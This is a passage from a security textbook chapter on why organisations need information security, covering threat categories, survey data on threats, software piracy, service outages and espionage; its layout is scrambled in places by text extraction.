Principles of Information Security 7E - Module 2

MODULE 2
The Need for Information

Security
Upon completion of this material, you should be able to: Our bad neighbor
1 Discuss the need for information security makes us early stir-
2 Explain why a successful information security program is the shared rers, which is both
responsibility of the entire organization healthful and good
3 List and describe the threats posed to information security and common attacks husbandry.
associated with those threats —William Shakespeare, King
Henry, in Henry V, Act 4, Scene 1
4 List the common information security issues that result from poor software
development efforts
Opening Scenario
Fred Chin, CEO of Sequential Label and Supply (SLS), leaned back in his leather chair and propped his feet up on the long
mahogany table in the conference room where the SLS Board of Directors had just adjourned from their quarterly meeting.
“What do you think about our computer security problem?” he asked Gladys Williams, the company’s chief information
officer (CIO). He was referring to the outbreak of a malicious worm on the company’s computer network the previous month.
Gladys replied, “I think we have a real problem, and we need to put together a real solution. We can’t sidestep this with
a quick patch like last time.” Six months ago, most of the systems on the company network had been infected with a virus
program that came from an employee’s personal USB drive. To prevent this from happening again, all users in the company
were now prohibited from using personal devices on corporate systems and networks.
Fred wasn’t convinced. “Can’t we just allocate additional funds to the next training budget?”
Gladys shook her head. “You’ve known for some time now that this business runs on technology. That’s why you hired me
as CIO. I’ve seen this same problem at other companies, and I’ve been looking into our information security issues. My staff and
I have some ideas to discuss with you. I’ve asked Charlie Moody to come in today to talk about it. He’s waiting to speak with us.”
When Charlie joined the meeting, Fred said, “Hello, Charlie. As you know, the Board of Directors met today. They received
a report on the costs and lost production from the malware outbreak last month, and they directed us to improve the security
of our technology. Gladys says you can help me understand what we need to do about it.”
“To start with,” Charlie said, “Instead of simply ramping up our antivirus solution or throwing resources at an endpoint
protection product, we need to start by developing a formal information security program. We need a thorough review of our
policies and practices, and we need to establish an ongoing risk management program. Then we can explore the technical
options we have. There are some other things that are part of the process as well, but this is where I think we should start.”
28 Principles of Information Security
“Sounds like it is going to be complicated … and expensive,” said Fred.

Charlie looked at Gladys and then answered, “Well, there will probably be some extra expenses for specialized hardware
and software, and we may have to slow down some of our product development projects a bit, but this approach will call
more for a change in our attitude about security than just a spending spree. I don’t have accurate estimates yet, but you can
be sure we’ll put cost-benefit worksheets in front of you before we commit any funds.”
Fred thought about this for a few seconds. “Okay. What’s our next step?”
Gladys answered, “First, we need to initiate a project plan to develop our new information security program. We’ll use
our usual systems development and project management approach. There are a few differences, but we can easily adapt our
current models. We’ll need to reassign a few administrators to help Charlie with the new program. We’d also like a formal
statement to the entire company identifying Charlie as our new chief information security officer and asking all of the depart-
ment heads to cooperate with his new information security initiatives.”
“Information security? What about computer security?” asked Fred.
Charlie responded, “Information security includes computer security, plus all the other things we use to do business:
securing our information, networks, operations, communications, personnel, and intellectual property. Even our paper records
need to be factored in.”
“I see,” Fred said. “Okay, Mr. Chief Information Security Officer.” Fred held out his hand for a congratulatory handshake.
“Bring me the draft project plan and budget in two weeks. The audit committee of the Board meets in four weeks, and we’ll
need to report our progress then.”
Introduction To The Need For Information Security

Unlike any other business or information technology program, the primary mission of an information security pro-
gram is to ensure that information assets—information and the systems that house them—are protected and thus
remain safe and useful. Organizations expend a lot of money and thousands of hours to maintain their information
assets. If threats to these assets didn’t exist, those resources could be used exclusively to improve the systems
that contain, use, and transmit the information. However, the threat of attacks on
information asset information assets is a constant concern, and the need for information security
The focus of information security; grows along with the sophistication of the attacks. While some organizations lump
information that has value to the both information and systems under their definition of an information asset, oth-
organization and the systems that
store, process, and transmit the
ers prefer to separate the true information-based assets (data, databases, data
information. sets, and the applications that use data) from their media—the technologies that
access, house, and carry the information. For our purposes, we will include both
media data and systems assets in our use of the term. Similarly, we’ll use the term infor-
As a subset of information assets, mation to describe both data and information, as for most organizations the
the systems, technologies, and terms can be used interchangeably.
networks that store, process, and Organizations must understand the environment in which information assets
transmit information.
reside so their information security programs can address actual and potential prob-
lems. This module describes the environment and identifies the threats to it, the
data
organization, and its information.
Items of fact collected by an organi-
zation; includes raw numbers, facts,
Information security performs four important functions for an organization:
and words.
Protecting the organization’s ability to function
Protecting the data and information the organization collects and uses,
information whether physical or electronic
Data that has been organized, Enabling the safe operation of applications running on the organization’s IT
structured, and presented to pro-
vide additional insight into its con-
systems
text, worth, and usefulness. Safeguarding the organization’s technology assets
Module 2 The Need for Information Security 29
Business Needs First

There is a long-standing saying in information security: When security needs and business needs collide, business wins.
Without the underlying business to generate revenue and use the information, the information may lose value, and
there would be no need for it. If the business cannot function, information security becomes less important. The key
is to balance the needs of the organization with the need to protect information assets, realizing that business needs
come first. This is not to say that information security should be casually ignored whenever there is a conflict, but to
stress that decisions associated with the degree to which information assets are protected should be made carefully,
considering both the business need to use the information and the need to protect it.
Protecting Functionality
The three communities of interest defined in Module 1—general management, IT management, and information security
management—are each responsible for facilitating the information security program that protects the organization’s
ability to function. Although many business and government managers shy away from addressing information security
because they perceive it to be a technically complex task, implementing information security has more to do with man-
agement than technology. Just as managing payroll involves management more than mathematical wage computations,
managing information security has more to do with risk management, policy, and its enforcement than the technology
of its implementation. As the noted information security author Charles Cresson Wood writes:
In fact, a lot of [information security] is good management for information technology. Many people think
that a solution to a technology problem is more technology. Well, not necessarily. … So a lot of my work, out
of necessity, has been trying to get my clients to pay more attention to information security as a management
issue in addition to a technical issue, information security as a people issue in addition to the technical issue.1
Each of an organization’s communities of interest must address information security in terms of business impact
and the cost of business interruption rather than isolating security as a technical problem.
Protecting Data That Organizations Collect and Use

Without data, an organization loses its record of transactions and its ability to deliver value to customers. Any business,
educational institution, or government agency that operates within the modern context of connected and responsive
services relies on information systems. Even when transactions are not online, information systems and the data they
process enable the creation and movement of goods and services. Therefore, protecting data in transmission, in pro-
cessing, and at rest (storage) is a critical aspect of information security. The value of data motivates attackers to steal,
sabotage, or corrupt it. An effective information security program implemented by management protects the integrity
and value of the organization’s data.
Organizations store much of the data they deem critical in databases, managed by specialized software known
as a database management system (DBMS). Database security is accomplished by applying a broad range of control
approaches common to many areas of information security. Securing databases encompasses most of the topics
covered in this textbook, including managerial, technical, and physical controls. Managerial controls include policy,
procedure, and governance. Technical controls used to secure databases rely on knowledge of access control, authenti-
cation, auditing, application security, backup and recovery, encryption, and integrity controls. Physical controls include
the use of data centers with locking doors, fire suppression systems, video monitoring, and physical security guards.
The fundamental practices of information security have broad applicability in database security. One indicator
of this strong degree of overlap is that the International Information System Secu-
rity Certification Consortium (ISC)2, the organization that evaluates candidates for
many prestigious information security certification programs, allows experience as a database
database administrator to count toward the experience requirement for the Certified A collection of related data stored
in a structured form and usually
Information Systems Security Professional (CISSP).
managed by specialized systems.
Enabling the Safe Operation of Applications

Today’s organizations are under immense pressure to acquire and operate integrated,
database security
A subset of information security
efficient, and capable applications. A modern organization needs to create an envi-
that focuses on the assessment and
ronment that safeguards these applications, particularly those that are important protection of information stored in
elements of the organization’s infrastructure—operating system platforms, certain data repositories.
operational applications, electronic mail (e-mail), and instant messaging (IM) applications, like text messaging (short
message service, or SMS). Organizations acquire these elements from a service provider, or they implement their
own. Once an organization’s infrastructure is in place, management must continue to oversee it and not relegate its
management to the IT department.
Safeguarding Technology Assets in Organizations

To perform effectively, organizations must employ secure infrastructure hardware appropriate to the size and scope
of the enterprise. For instance, a small business may get by in its start-up phase using a small-scale firewall, such as a
small office/home office (SOHO) device.
In general, as an organization grows to accommodate changing needs, more robust technology solutions should
replace security technologies the organization has outgrown. An example of a robust solution is a commercial-grade, uni-
fied security architecture device, complete with intrusion detection and prevention systems, public key infrastructure
(PKI), and virtual private network (VPN) capabilities. Modules 8 through 10 describe these technologies in more detail.
Information technology continues to add new capabilities and methods that allow organizations to solve business infor-
mation management challenges. In recent years, we have seen the emergence of the Internet and the Web as new markets.
Cloud-based services, which have created new ways to deliver IT services, have also brought new risks to organizational
information, additional concerns about the ways these assets can be threatened, and concern for how they must be defended.
Information Security Threats And Attacks

Around 500 B.C., the Chinese general Sun Tzu Wu wrote The Art of War, a military treatise that emphasizes the impor-
tance of knowing yourself as well as the threats you face.2 To protect your organization’s information, you must
(1) know yourself—that is, be familiar with the information to be protected and the systems that store, transport,
and process it—and (2) know your enemy; in other words, the threats you face. To make sound decisions about infor-
mation security, management must be informed about the various threats to an organization’s people, applications,
data, and information systems. As discussed in Module 1, a threat represents a potential risk to an information asset,
whereas an attack represents an ongoing act against the asset that could result in a loss. Threat agents damage or steal
an organization’s information or physical assets by using exploits to take advantage of vulnerabilities where controls
are not present or no longer effective. Unlike threats, which are always present, attacks exist only when a specific act
may cause a loss. For example, the threat of damage from a thunderstorm is present throughout the summer in many
places, but an attack and its associated risk of loss exist only for the duration of an actual thunderstorm. The follow-
ing sections discuss each of the major types of threats and corresponding attacks facing modern information assets.
i For more information on The Art of War, check out MIT’s Classics page at http://classics.mit.edu/Tzu/artwar.html.
To investigate the wide range of threats that pervade the interconnected world, many researchers have collected
information on threats and attacks from practicing information security personnel and their organizations. While the
categorizations may vary, threats are relatively well researched and understood.
4.8 Billion Potential Hackers

There is wide agreement that the threat from external sources increases when an organization connects to the
Internet. The number of Internet users continues to grow; about 62 percent of the world’s almost 7.8 billion people—
that is, more than 4.8 billion people—have some form of Internet access, a dramatic increase over the 49.2 percent
reported as recently as 2015. Table 2-1 shows Internet usage by continent. Since
exploit
the time this data was collected in mid-2020, the world population has continued to
A technique used to compromise
grow, with an expected increase in Internet usage. Therefore, a typical organization
a system; may also describe the
tool, program, or script used in the with an online connection to its systems and information faces an ever-increasing
compromise. pool of potential hackers.
Table 2-1 World Internet Usage3
Population Population Internet Users Penetration Growth Internet

World Regions (2020 Est.) % of World (6/30/2020) Rate (% Pop.) 2000–2020 World %
Africa 1,340,598,447 17.2% 566,138,772 42.2% 12,441% 11.7%
Asia 4,294,516,659 55.1% 2,525,033,874 58.8% 2,109% 52.2%
Europe 834,995,197 10.7% 727,848,547 87.2% 592% 15.1%
Latin America/ 654,287,232 8.4% 467,817,332 71.5% 2,489% 9.7%
Caribbean
Middle East 260,991,690 3.3% 184,856,813 70.8% 5,527% 3.8%
North America 368,869,647 4.7% 332,908,868 90.3% 208% 6.9%
Oceania/Australia 42,690,838 0.5% 28,917,600 67.7% 279% 0.6%
WORLD TOTAL 7,796,949,710 100.0% 4,833,521,806 62.0% 1,239% 100.0%
Notes: Internet usage and world population estimates are as of July 20, 2020.
Other Studies of Threats

Several studies in recent years have examined the threats and attacks to information security. One of the most recent
studies, conducted in 2015, found that 67.1 percent of responding organizations suffered malware infections.
More than 98 percent of responding organizations identified malware attacks as a threat, with 58.7 percent indi-
cating they were a significant or severe threat. Malware was identified as the second-highest threat source behind
electronic phishing/spoofing.4
Table 2-2 shows these and other threats from internal stakeholders. Table 2-3 shows threats from external stake-
holders. Table 2-4 shows general threats to information assets.
Table 2-2 Rated Threats from Internal Sources in 2015 SEC/CISE Survey of Threats to Information Protection5
Not a A Severe
Threat Threat Comp.
From Employees or Internal Stakeholders 1 2 3 4 5 Rank
Inability/unwillingness to follow established 6.6% 17.2% 33.6% 26.2% 16.4% 66%
policy
Disclosure due to insufficient training 8.1% 23.6% 29.3% 25.2% 13.8% 63%
Unauthorized access or escalation of 4.8% 24.0% 31.2% 31.2% 8.8% 63%
privileges
Unauthorized information collection/data 6.4% 26.4% 40.0% 17.6% 9.6% 60%
sniffing
Theft of on-site organizational information 10.6% 32.5% 34.1% 12.2% 10.6% 56%
assets
Theft of mobile/laptop/tablet and related/ 15.4% 29.3% 28.5% 17.9% 8.9% 55%
connected information assets
Intentional damage or destruction of 22.3% 43.0% 18.2% 13.2% 3.3% 46%
information assets
Theft or misuse of organizationally leased, 29.6% 33.6% 21.6% 10.4% 4.8% 45%
purchased, or developed software
Web site defacement 43.4% 33.6% 16.4% 4.9% 1.6% 38%
Blackmail of information release or sales 43.5% 37.1% 10.5% 6.5% 2.4% 37%
Table 2-3 Rated Threats from External Sources in 2015 SEC/CISE Survey of Threats to Information
Protection6
Not a A Severe
Threat Threat Comp.
From Outsiders or External Stakeholders 1 2 3 4 5 Rank
Unauthorized information collection/data 6.4% 14.4% 21.6% 32.8% 24.8% 71%
sniffing
Unauthorized access or escalation of 7.4% 14.0% 26.4% 31.4% 20.7% 69%
privileges
Web site defacement 8.9% 23.6% 22.8% 26.8% 17.9% 64%
Intentional damage or destruction of 14.0% 32.2% 18.2% 24.8% 10.7% 57%
information assets
Theft of mobile/laptop/tablet and related/ 20.5% 25.4% 26.2% 15.6% 12.3% 55%
connected information assets
Theft of on-site organizational information 21.1% 24.4% 25.2% 17.9% 11.4% 55%
assets
Blackmail of information release or sales 31.1% 30.3% 14.8% 14.8% 9.0% 48%
Disclosure due to insufficient training 34.5% 21.8% 22.7% 13.4% 7.6% 48%
Inability/unwillingness to follow 33.6% 29.4% 18.5% 6.7% 11.8% 47%
established policy
Theft or misuse of organizationally leased, 31.7% 30.1% 22.8% 9.8% 5.7% 46%
purchased, or developed software
Table 2-4 Perceived Threats to Information Assets in 2015 SEC/CISE Survey of Threats to Information
Protection7
Not a A Severe
Threat Threat Comp.
General Threats to Information Assets 1 2 3 4 5 Rank
Electronic phishing/spoofing attacks 0.8% 13.1% 16.4% 32.0% 37.7% 79%
Malware attacks 1.7% 12.4% 27.3% 36.4% 22.3% 73%
Unintentional employee/insider 2.4% 17.1% 26.8% 35.8% 17.9% 70%
mistakes
Loss of trust due to information loss 4.1% 18.9% 27.0% 22.1% 27.9% 70%
Software failures or errors due to 5.6% 18.5% 28.2% 33.9% 13.7% 66%
unknown vulnerabilities in externally
acquired software
Social engineering of employees/insiders 8.1% 14.6% 32.5% 34.1% 10.6% 65%
based on social media information
based on other published information
Software failures or errors due to 7.2% 21.6% 24.0% 32.0% 15.2% 65%
poorly developed, internally created
applications
SQL injections 7.6% 17.6% 31.9% 29.4% 13.4% 65%
(continues)
Table 2-4 Perceived Threats to Information Assets in 2015 SEC/CISE Survey of Threats to Information
Protection7 (Continued)
Not a A Severe
Threat Threat Comp.
General Threats to Information Assets 1 2 3 4 5 Rank
based on organization’s Web sites
Denial of service (and distributed DoS) 8.2% 23.0% 27.9% 32.8% 8.2% 62%
attacks
Software failures or errors due to known 8.9% 23.6% 26.8% 35.8% 4.9% 61%
vulnerabilities in externally acquired
software
Outdated organizational software 8.1% 28.2% 26.6% 26.6% 10.5% 61%
Loss of trust due to representation as 9.8% 23.8% 30.3% 23.0% 13.1% 61%
source of phishing/spoofing attack
Loss of trust due to Web defacement 12.4% 30.6% 31.4% 19.8% 5.8% 55%
Outdated organizational hardware 17.2% 34.4% 32.8% 12.3% 3.3% 50%
Outdated organization data format 18.7% 35.8% 26.8% 13.8% 4.9% 50%
Inability/unwillingness to establish 30.4% 26.4% 24.0% 13.6% 5.6% 48%
effective policy by management
Hardware failures or errors due to aging 19.5% 39.8% 24.4% 14.6% 1.6% 48%
equipment
Hardware failures or errors due to 17.9% 48.0% 24.4% 8.1% 1.6% 46%
defective equipment
Deviations in quality of service from 25.2% 38.7% 25.2% 7.6% 3.4% 45%
other provider
Deviations in quality of service from data 26.4% 39.7% 23.1% 7.4% 3.3% 44%
communications provider/ISP
telecommunications provider/ISP (if
different from data provider)
Loss due to other natural disaster 31.0% 37.9% 23.3% 6.9% 0.9% 42%
Loss due to fire 26.2% 49.2% 21.3% 3.3% 0.0% 40%
power provider
Loss due to flood 33.9% 43.8% 19.8% 1.7% 0.8% 38%
Loss due to earthquake 41.7% 35.8% 15.0% 6.7% 0.8% 38%
Common Attack Pattern Enumeration and Classification

(CAPEC)
A tool that security professionals can use to understand attacks is the Common Attack Pattern Enumeration and Clas-
sification (CAPEC) Web site hosted by Mitre—a nonprofit research and development organization sponsored by the
U.S. government. This online repository can be searched for characteristics of a particular attack or simply browsed
by professionals who want additional knowledge of how attacks occur procedurally.
i For more information on CAPEC, visit http://capec.mitre.org, where contents can be downloaded or viewed online.
The 12 Categories Of Threats

The scheme shown in Table 2-5 consists of 12 general categories of threats that represent a clear and present danger
to an organization’s people, information, and systems. Each organization must prioritize the threats it faces based on
the particular security situation in which it operates, its organizational strategy regarding risk, and the exposure levels
of its assets. Module 4 covers these topics in more detail. You may notice that many of the attack examples in Table 2-5
could be listed in more than one category. For example, an attack performed by a hacker to steal customer data falls
into the category of “theft,” but it can also be preceded by “espionage or trespass,” as the hacker illegally accesses
the information. The theft may also be accompanied by Web site defacement actions to delay discovery, qualifying it
for the category of “sabotage or vandalism.” As mentioned in Module 1, these are technically threat sources, but for
simplicity’s sake, they are described here as threats.
Compromises to Intellectual Property

Many organizations create or support the development of intellectual property (IP) as part of their business opera-
tions. (You will learn more about IP in Module 6.) IP includes trade secrets, copyrights, trademarks, and patents. IP is
protected by copyright law and other laws, carries the expectation of proper attribution or credit to its source, and
potentially requires the acquisition of permission for its use, as specified in those
laws. For example, use of some IP may require specific payments or royalties before
intellectual property a song can be used in a movie or before the distribution of a photo in a publication.
(IP)
The unauthorized appropriation of IP constitutes a threat to information security—
Original ideas and inventions cre-
ated, owned, and controlled by a for example, when employees take an idea they developed at work and use it to
particular person or organization; make money for themselves. Employees may have access privileges to a variety of
IP includes the representation of IP, including purchased and developed software and organizational information, as
original ideas.
many employees typically need to use IP to conduct day-to-day business.
software piracy Software Piracy

The unauthorized duplication,
installation, or distribution of copy-
Organizations often purchase or lease the IP of other organizations and must abide
righted computer software, which is by a purchase or licensing agreement for its fair and responsible use. The most com-
a violation of intellectual property. mon IP breach is software piracy. Because most software is licensed to an individual
Table 2-5 The 12 Categories of Threats to Information Security8
Category of Threat Attack Examples

Compromises to intellectual property Piracy, copyright infringement
Deviations in quality of service Internet service provider (ISP), power, or WAN service problems
Espionage or trespass Unauthorized access and/or data collection
Forces of nature Fire, floods, earthquakes, lightning
Human error or failure Accidents, employee mistakes
Information extortion Blackmail, information disclosure
Sabotage or vandalism Destruction of systems or information
Software attacks Viruses, worms, macros, denial of service
Technical hardware failures or errors Equipment failure
Technical software failures or errors Bugs, code problems, unknown loopholes
Technological obsolescence Antiquated or outdated technologies
Theft Illegal confiscation of equipment or information
user, its use is restricted to a single installation or to a designated user in an organization. If a user copies the program
to another computer without securing another license or transferring the license, the user has violated the copyright.
The nearby feature describes a classic case of this type of copyright violation. While you may note that the example
is from 1997, which seems a long time ago, it illustrates that the issue remains significant today.
Software licenses are strictly enforced by regulatory and private organizations, and software publishers use sev-
eral control mechanisms to prevent copyright infringement. In addition to laws against software piracy, two watchdog
organizations investigate allegations of software abuse: the Software and Information Industry Association (SIIA) at
www.siia.net, formerly known as the Software Publishers Association, and the Business Software Alliance (BSA) at www.
bsa.org. BSA estimates that approximately 37 percent of software installed on personal computers globally, as reported
in the 2018 findings, was not properly licensed. This number is only slightly lower than the 39 percent reported in the
2016 BSA global study; however, the majority of countries in the study indicate unlicensed rates in excess of 50 percent.
Furthermore, BSA estimates an increased risk of malware for systems using unlicensed software. 9 Figure 2-1 shows the
BSA’s software piracy reporting Web site.
Source: Business Software Alliance. Used with permission.
Figure 2-1 BSA’s software piracy reporting Web site
Copyright Protection and User Registration

A number of technical mechanisms—digital watermarks, embedded code, copyright codes, and even the inten-
tional placement of bad sectors on software media—have been used to enforce copyright laws. The most com-
mon tool is a unique software registration code in combination with an end-user license agreement (EULA) that
usually pops up during the installation of new software, requiring users to indicate that they have read and
agree to conditions of the software’s use. Figure 2-2 shows a license agreement from Microsoft for an Office 365
subscription.10
Source: Microsoft. Used with permission.

Figure 2-2 Microsoft Office software license terms
Another effort to combat piracy is online registration. Users who install software are often asked or even required
to register their software to complete the installation, obtain technical support, or gain the use of all features. Some
users believe that this process compromises personal privacy because they never know exactly what information is
obtained from their computers and sent to the software manufacturer. Figure 2-3 shows an example of online software
registration from the Steam game client. Steam requires the user to create an account and log in to it before register-
ing software.
Intellectual property losses may result from the successful exploitation of vulnerabilities in asset protection con-
trols. Many of the threats against these controls are described in this module.
Source: Steam Online. Used with permission.
Figure 2-3 Steam subscriber agreement and product registration

Violating Software Licenses

Adapted from “Bootlegged Software Could Cost Community College”11
By Natalie Patton, Las Vegas Review Journal, September 18, 1997
Ever heard of the software police? The Washington-based Software Publishers Association (SPA) copyright watchdogs were
tipped off that a community college in Las Vegas, Nevada, was using copyrighted software in violation of the software
licenses. The SPA spent months investigating the report. Academic Affairs Vice President Robert Silverman said the college
was prepared to pay some license violation fines, but was unable to estimate the total amount of the fines. The college cut
back on new faculty hires and set aside more than $1.3 million in anticipation of the total cost.
The audit was intensive, and it examined every computer on campus, including faculty machines, lab machines, and the
college president’s computer. Peter Beruk, SPA’s director of domestic antipiracy cases, said the decision to audit a reported
violation is only made when there is overwhelming evidence to win a lawsuit, as the SPA has no policing authority and can only
bring civil actions. Most investigated organizations settle out of court and agree to pay the fines to avoid costly court battles.
The process begins with an anonymous tip, usually from someone inside the organization. Of the hundreds of tips the
SPA receives each week, only a handful are selected for on-site visits. If the audited organizations have license violations,
they are required to destroy illegal software copies, repurchase software they want to keep (at double the retail price), and
pay the proper licensing fees for the software they used illegally.
In this case, the community college president suggested the blame for the college’s violations belonged to faculty and
students who may have downloaded illegal copies of software from the Internet or installed software on campus computers
without permission. Some of the faculty suspected that the problem lay with the qualifications and credibility of the campus
technology staff. The president promised to put additional staff and rules in place to prevent future license violations.
Deviations in Quality of Service

An organization’s information system depends on the successful operation of many interdependent support systems,
including power grids, data and telecommunications networks, parts suppliers, service vendors, and even janitorial
staff and garbage haulers. Any of these support systems can be interrupted by severe weather, intentional or acciden-
tal employee actions, or other unforeseen events. Deviations in quality of service can result from such accidents as a
backhoe taking out the organization’s Internet connection or phone lines. The backup provider may be online and in
service but may be able to supply only a fraction of the bandwidth the organization needs for full service. This deg-
radation of service is a form of availability disruption. Irregularities in Internet service, communications, and power
supplies can dramatically affect the availability of information and systems.
Internet Service Issues

In organizations that rely heavily on the Internet and the World Wide Web to sup-
port continued operations, ISP failures can considerably undermine the availability availability disruption
of information. Many organizations have sales staff and telecommuters working at An interruption or disruption in
remote locations. When these off-site employees cannot contact the host systems, service, usually from a service pro-
vider, which causes an adverse
they must use manual procedures to continue operations. The U.S. government’s
event within an organization.
Federal Communications Commission (FCC) maintains a Network Outage Reporting
System (NORS), which according to FCC regulation 47 C.F.R. Part 4, requires com-
service level
munications providers to report outages that disrupt communications at certain agreement (SLA)
facilities, like emergency services and airports. A document or part of a document
When an organization places its Web servers in the care of a Web hosting that specifies the expected level
provider, that provider assumes responsibility for all Internet services and for the of service from a service provider,
including provisions for minimum
hardware and operating system software used to operate the Web site. These Web
acceptable availability and penal-
hosting services are usually arranged with a service level agreement (SLA). When ties or remediation procedures for
a service provider fails to meet the terms of the SLA, the provider may accrue fines downtime.
uptime to cover losses incurred by the client, but these payments seldom cover the losses
The percentage of time a particular generated by the outage. Vendors may promote high availability or uptime (or
service is available. low downtime), but Figure 2-4 shows even an availability that seems acceptably
high can cost the average organization a great deal. In August 2013, for example,
downtime the Amazon.com Web site went down for 30 to 40 minutes, costing the company
The percentage of time a particular between $3 million and $4 million. Another widely reported disruption was the
service is not available. Mirai botnet event in 2016, a massive attack that disrupted Internet access in parts
of Europe and the United States.
i If you suspect that a widely used Internet service is down, you can check its status at https://downdetector.com/.
What are the top causes of downtime?

40%
25%
19%
17% 15%
13%
9%
5% 4% 3% 3%
1%
re
re
ism
re
o
e
re
er
n
r
d
an
ad
ro
ilu
or
ilu
lu
io
oo
th
Fi
or
er
ai
ric
at
rn
st
fa
O
fa
Fl
rr
f
st
To
r
ur
an
e
k
Te
e
te
ar
er
ar
or
H
um
in
w
w
dw
W
ft
Po
H
et
ar
So
N
H
Breakdown of downtime
Hours At $12,500 per hour of downtime (Avg. cost for SMBS)
Unavailable At $212,100 per hour of downtime (Avg. cost for all businesses)
$549,000
99.5% 43.92
$9,315,432
Source: Fusion Connect. Used with permission.
$109,500
99.9% 8.76
$1,857,996
$54,750
99.95% 4.38
$928,998
$10,950
99.99% 0.53
$185,800
$1,096
99.999% 0.05
$18,594
Figure 2-4 Average cost of downtime according to Fusion Connect12

Communications and Other Service Provider Issues

Other utility services can affect organizations as well. Among these are telephone,
water, wastewater, trash pickup, cable television, natural or propane gas, and
custodial services. The loss of these services can impair the ability of an orga-
blackout
A long-term interruption (outage) in
nization to function. For instance, most facilities require water service to oper-
electrical power availability.
ate an air-conditioning system. Even in Minnesota in February, air-conditioning
systems help keep a modern facility operating. If a wastewater system fails, an
brownout
organization might be prevented from allowing employees into the building. While
A long-term decrease in quality of
several online utilities allow an organization to compare pricing options from electrical power availability.
various service providers, only a few show a comparative analysis of availability
or downtime.
fault
A short-term interruption in electri-
Power Irregularities cal power availability.
Irregularities from power utilities are common and can lead to fluctuations such
as power excesses, power shortages, and power losses. These fluctuations can noise
pose problems for organizations that provide inadequately conditioned power The presence of additional and
for their information systems equipment. In the United States, we are supplied disruptive signals in network com-
120-volt, 60-cycle power, usually through 15- and 20-amp circuits. Europe as munications or electrical power
delivery.
well as most of Africa, Asia, South America, and Australia use 230-volt, 50-cycle
power. With the prevalence of global travel by organizational employees, fail-
ure to properly adapt to different voltage levels can damage computing equip- sag
A short-term decrease in electrical
ment, resulting in a loss. When power voltage levels vary from normal, expected
power availability.
levels, such as during a blackout , brownout , fault, noise , sag, spike, or surge ,
an organization’s sensitive electronic equipment— especially networking
spike
equipment, computers, and computer-based systems, which are vulnerable to
A short-term increase in electrical
fluctuations—can be easily damaged or destroyed. With small computers and power availability, also known as
network systems, power-conditioning options such as surge suppressors can a swell.
smooth out spikes. The more expensive uninterruptible power supply (UPS)
can protect against spikes and surges as well as sags and even blackouts of surge
limited duration. A long-term increase in electrical
power availability.
Espionage or Trespass competitive

Espionage or trespass is a well-known and broad category of electronic and intelligence
human activities that can breach the confidentiality of information. When an The collection and analysis of infor-
unauthorized person gains access to information an organization is trying to mation about an organization’s
business competitors through legal
protect, the act is categorized as espionage or trespass. Attackers can use many and ethical means to gain busi-
different methods to access the information stored in an information system. ness intelligence and competitive
Some information-gathering techniques are legal—for example, using a Web advantage.
browser to perform market research. These legal techniques are collectively
called competitive intelligence . When information gatherers employ tech- industrial espionage
niques that cross a legal or ethical threshold, they are conducting industrial The collection and analysis of
espionage. Many countries that are considered allies of the United States engage information about an organiza-
tion’s business competitors, often
in industrial espionage against American organizations. When foreign govern- through illegal or unethical means,
ments are involved, these activities are considered espionage and a threat to to gain an unfair competitive
national security. advantage; also known as corpo-
rate spying.
For more information about industrial espionage in the United States, visit the National Counterintelligence and
i Security Center at www.dni.gov/index.php/ncsc-home. Look through the resources for additional information on
top issues like economic espionage, cyber threats, and insider threats.
Some forms of espionage are relatively low-tech. One

example, called shoulder surfing, is pictured in Figure 2-5.
This technique is used in public or semipublic settings
when people gather information they are not authorized
to have. Instances of shoulder surfing occur at computer
terminals, desks, and ATMs; on a bus, airplane, or subway,
where people use smartphones and tablets; and in other
places where employees may access confidential infor-
mation. Shoulder surfing flies in the face of the unwritten
etiquette among professionals who address information
security in the workplace: If you can see another person
entering personal or private information into a system,
look away as the information is entered. Failure to do so
constitutes not only a breach of etiquette but an affront
to privacy and a threat to the security of confidential
information.
To avoid shoulder surfing, try not to access confi-
dential information when another person is present.
People should limit the number of times they access con-
fidential data, and should do it only when they are sure
nobody can observe them. Users should be constantly
aware of the presence of others when accessing sensitive
Figure 2-5 Shoulder surfing
information.
shoulder surfing Hackers

The direct, covert observation of Acts of trespass can lead to unauthorized real or virtual actions that enable informa-
individual information or system tion gatherers to enter premises or systems without permission. Controls sometimes
use.
mark the boundaries of an organization’s virtual territory. These boundaries give
notice to trespassers that they are encroaching on the organization’s cyberspace.
trespass Sound principles of authentication and authorization can help organizations protect
Unauthorized entry into the real or valuable information and systems. These control methods and technologies employ
virtual property of another party.
multiple layers or factors to protect against unauthorized access and trespass.
The classic perpetrator of espionage or trespass is the hacker, who is frequently
hacker glamorized in fictional accounts as a person who stealthily manipulates a maze of
A person who accesses systems computer networks, systems, and data to find information that solves the mystery
and information without authoriza-
and heroically saves the day. However, the true life of the hacker is far more mun-
tion and often illegally.
dane. The profile of the typical hacker has shifted from that of a 13- to 18-year-old
male with limited parental supervision who spends all of his free time on the com-
expert hacker puter; by comparison, modern hackers have fewer known attributes (see Figure 2-6).
A hacker who uses extensive knowl-
In the real world, a hacker frequently spends long hours examining the types and
edge of the inner workings of com-
puter hardware and software to structures of targeted systems and uses skill, guile, or fraud to attempt to bypass
gain unauthorized access to sys- controls placed on information owned by someone else.
tems and information, and who Hackers possess a wide range of skill levels, as with most technology users.
often creates automated exploits,
scripts, and tools used by other However, most hackers are grouped into two general categories: the expert hacker
hackers; also known as an elite and the novice hacker. The expert hacker is usually a master of several program-
hacker. ming languages, networking protocols, and operating systems, and exhibits a mas-
tery of the technical environment of the chosen targeted system. As described
novice hacker in the nearby feature “Hack PCWeek,” expert hackers are extremely talented and
A relatively unskilled hacker who usually devote extensive time and energy attempting to break into other people’s
uses the work of expert hackers to
information systems. Even though this example occurred several years ago, it
perform attacks; also known as a
neophyte, n00b, newbie, script kid- illustrates that systems and networks are still attacked and compromised using
die, or packet monkey. the same techniques.
Breaking into computer systems, Theft of confidential information, Disclosure of stolen confidential
information, Hijacking victims’ e-mail accounts, and Defacing Internet websites
IMA HACKER
?
No Photograph Available
Aliases: “Lost” “All your PC are belong to me” “Cyber-Merlin”
DESCRIPTION
Date(s) of Birth Used: unknown Hair: unknown
Place of Birth: unknown Eyes: unknown
Height: unknown Sex: unknown
Weight: unknown Race: unknown
NCIC: A1234566789 Nationality: unknown
Occupation: unknown
Scars and Marks:

unknown
Individual may be age 12−60, male or female, unkown
Remarks:
background, with varying technological skill levels; may be
internal or external to the organization.
CAUTION
Figure 2-6 Contemporary hacker profile
In 2017, the Singapore Ministry of Defense invited hackers to test its publicly professional hacker
accessible system for vulnerabilities. In March 2016, General Motors (GM) invited A hacker who conducts attacks for
